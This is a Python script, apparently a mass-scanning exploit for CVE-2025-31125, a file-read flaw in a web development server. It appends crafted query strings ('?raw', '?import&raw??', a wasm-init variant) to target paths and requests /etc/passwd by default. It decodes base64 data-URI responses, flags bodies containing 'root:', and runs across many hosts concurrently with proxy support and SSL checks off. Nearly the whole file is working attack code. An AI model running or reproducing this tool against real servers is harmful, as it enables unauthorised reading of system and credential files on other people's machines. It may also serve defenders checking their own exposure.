# NOTE(review): removed stray extraction artifacts ("README.md" / "Rendering
# markdown...") that preceded the code — they were not valid Python.
import base64
import requests
import argparse
import urllib3
import concurrent.futures
import re
import time
import threading
from urllib.parse import urljoin
from colorama import Fore, Style, init
# Initialise colorama so ANSI colours also work on Windows consoles
# (autoreset restores the default style after every print).
init(autoreset=True)
# Suppress SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Maximum number of retries per request (used by fetch_url's exponential backoff)
RETRY_LIMIT = 3
# Global lock serialising console output across worker threads
print_lock = threading.Lock()
# VERBOSE-mode regex matching a "data:text/plain;base64,<payload>" URI,
# optionally wrapped in single/double quotes; the base64 payload is captured
# in group 2.  The `#` comments below live INSIDE the pattern string and are
# ignored by re.VERBOSE — do not treat them as code comments.
CVE_2025_31125_base_pattern = r'''
data:text/plain;base64, # 固定前缀
(["']?) # 可选引号(支持单/双引号或无引号)
(
(?:[A-Za-z0-9+/]{4})* # 标准分组(每4字符)
(?:[A-Za-z0-9+/]{3}= # 允许1个填充符
| [A-Za-z0-9+/]{2}==)? # 允许2个填充符
)
\1 # 闭合引号(若存在)
'''
def sanitize_filename(url):
    """Turn *url* into a filesystem-safe name.

    Every character outside ``[A-Za-z0-9_-]`` becomes ``_``, runs of
    underscores collapse to one, and leading/trailing underscores are
    removed.
    """
    safe = re.sub(r'[^\w\-]', '_', url)   # replace illegal characters
    safe = re.sub(r'_+', '_', safe)       # collapse repeated underscores
    return safe.strip('_')                # trim underscores at both ends
def fetch_url(url, proxy, retries=0):
    """GET *url* once (redirects disabled), retrying on connection errors.

    Retries up to RETRY_LIMIT times with exponential backoff (1s, 2s, 4s).
    Returns the response body on HTTP 200, otherwise None.
    """
    proxies = {"http": proxy, "https": proxy} if proxy else None
    attempt = retries
    while True:
        try:
            resp = requests.get(url, timeout=5, verify=False,
                                proxies=proxies, allow_redirects=False)
        except requests.exceptions.RequestException:
            if attempt < RETRY_LIMIT:
                time.sleep(2 ** attempt)  # exponential backoff
                attempt += 1
                continue
            with print_lock:
                print(f"[ERROR] {url} Connection error")
            return None
        if resp.status_code == 200:
            return resp.text
        with print_lock:
            print(f"[FAIL] {url}")
        return None
def check_path(base_url, path, proxy, output_file):
    """Probe one *path* on *base_url* with three file-read payload variants.

    Variant 1 uses ``?raw``, variant 2 ``?import&raw??``, and variant 3 the
    wasm-init trick, which serves the file as a base64 data URI that must be
    decoded before the ``root:`` marker check.  On a hit the winning URL is
    printed and appended to *output_file* and returned; returns None on miss.
    """
    target = urljoin(base_url, path)
    url1 = target + "?raw"
    url2 = target + "?import&raw??"
    url3 = target + "?import&?inline=1.wasm?init"
    # One worker per request so all three probes run concurrently
    # (the original max_workers=2 needlessly queued the third probe).
    with concurrent.futures.ThreadPoolExecutor(max_workers=3) as inner_executor:
        future1 = inner_executor.submit(fetch_url, url1, proxy)
        future2 = inner_executor.submit(fetch_url, url2, proxy)
        future3 = inner_executor.submit(fetch_url, url3, proxy)
        content1 = future1.result()
        content2 = future2.result()
        content3 = future3.result()
    # BUG FIX: fetch_url may return None; the original passed it straight to
    # re.search and crashed with TypeError.  Also tolerate malformed base64
    # and non-UTF-8 payloads instead of raising mid-scan.
    if content3:
        match = re.search(CVE_2025_31125_base_pattern, content3, re.VERBOSE)
        if match:
            try:
                content3 = base64.b64decode(match.group(2)).decode(
                    "utf-8", errors="replace")
            except ValueError:  # binascii.Error is a ValueError subclass
                pass  # keep the raw body; the marker check below just misses
    # Report the first variant whose body looks like /etc/passwd.
    for url, content in ((url1, content1), (url2, content2), (url3, content3)):
        if content and "root:" in content:
            with print_lock:
                print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {url}")
            with open(output_file, "a", encoding="utf-8") as f:
                f.write(f"[SUCCESS] {url}\n")
            return url
    with print_lock:
        print(f"[FAIL] {url1}")
        print(f"[FAIL] {url2}")
        print(f"[FAIL] {url3}")
    return None
def check_url(base_url, paths, proxy, output_file):
    """Scan every entry of *paths* under *base_url* concurrently.

    Returns the list of payload URLs that produced a hit.
    """
    hits = []
    with concurrent.futures.ThreadPoolExecutor() as pool:
        pending = {
            pool.submit(check_path, base_url, p, proxy, output_file): p
            for p in paths
        }
        for done in concurrent.futures.as_completed(pending):
            outcome = done.result()
            if outcome:
                hits.append(outcome)
    return hits
def check_urls_from_file(file_path, paths, proxy):
    """Read base URLs (one per line) from *file_path* and scan each one.

    Each base URL is scanned against every entry in *paths* concurrently;
    successful payload URLs are appended to ``output.txt`` (by check_path)
    and returned as a flat list.
    """
    with open(file_path, 'r', encoding="utf-8") as file:
        # BUG FIX: skip blank lines so trailing newlines in the input file
        # no longer produce bogus requests against an empty base URL.
        links = [line.strip() for line in file if line.strip()]
    with print_lock:
        print(f"[INFO] Processing {len(links)} base URLs concurrently.")
    output_file = "output.txt"
    # BUG FIX: the original opened output_file here as an unused handle and
    # held it open for the entire scan while check_path re-opened the same
    # file for every write; the redundant handle is removed.
    results = []
    with concurrent.futures.ThreadPoolExecutor() as executor:
        future_to_link = {
            executor.submit(check_url, link, paths, proxy, output_file): link
            for link in links
        }
        for future in concurrent.futures.as_completed(future_to_link):
            res = future.result()
            if res:
                results.extend(res)
    return results
def check_urls_from_dict(paths, proxy):
    """Treat each entry of *paths* as a complete URL, fetch it, record hits.

    A URL counts as a hit when its body contains ``root:``; hits are
    appended to ``output.txt`` and returned as a list.
    """
    output_file = "output.txt"
    results = []
    with open(output_file, "a", encoding="utf-8") as log:
        with concurrent.futures.ThreadPoolExecutor() as pool:
            pending = {pool.submit(fetch_url, target, proxy): target
                       for target in paths}
            for done in concurrent.futures.as_completed(pending):
                target = pending[done]
                body = done.result()
                if body and "root:" in body:
                    with print_lock:
                        print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {target}")
                        log.write(f"[SUCCESS] {target}\n")
                    results.append(target)
                else:
                    with print_lock:
                        print(f"[FAIL] {target}")
    return results
if __name__ == "__main__":
    # Command-line entry point: choose scan mode from the supplied flags.
    parser = argparse.ArgumentParser(description="Batch check access to multiple paths on multiple links")
    parser.add_argument("-f", "--file", help="File containing base links")
    parser.add_argument("-u", "--url", help="Target URL")
    parser.add_argument("-p", "--payload", default='/etc/passwd', help="Target file path")
    parser.add_argument("-d", "--dict", help="File containing list of paths to append to base URL")
    parser.add_argument("--proxy", help="Proxy server (e.g., http://proxy:port)")
    args = parser.parse_args()

    # Build the path list: a dictionary file wins over the single payload.
    if args.dict:
        with open(args.dict, 'r') as dict_file:
            paths = [line.strip() for line in dict_file]
    elif args.payload:
        paths = [args.payload]
    else:
        paths = []

    # Dispatch: single URL > URL file > raw path list from the dictionary.
    if args.url:
        check_url(args.url, paths, args.proxy, "output.txt")
    elif args.file:
        check_urls_from_file(args.file, paths, args.proxy)
    elif args.dict:
        check_urls_from_dict(paths, args.proxy)
    else:
        print("Usage: python3 script.py -h")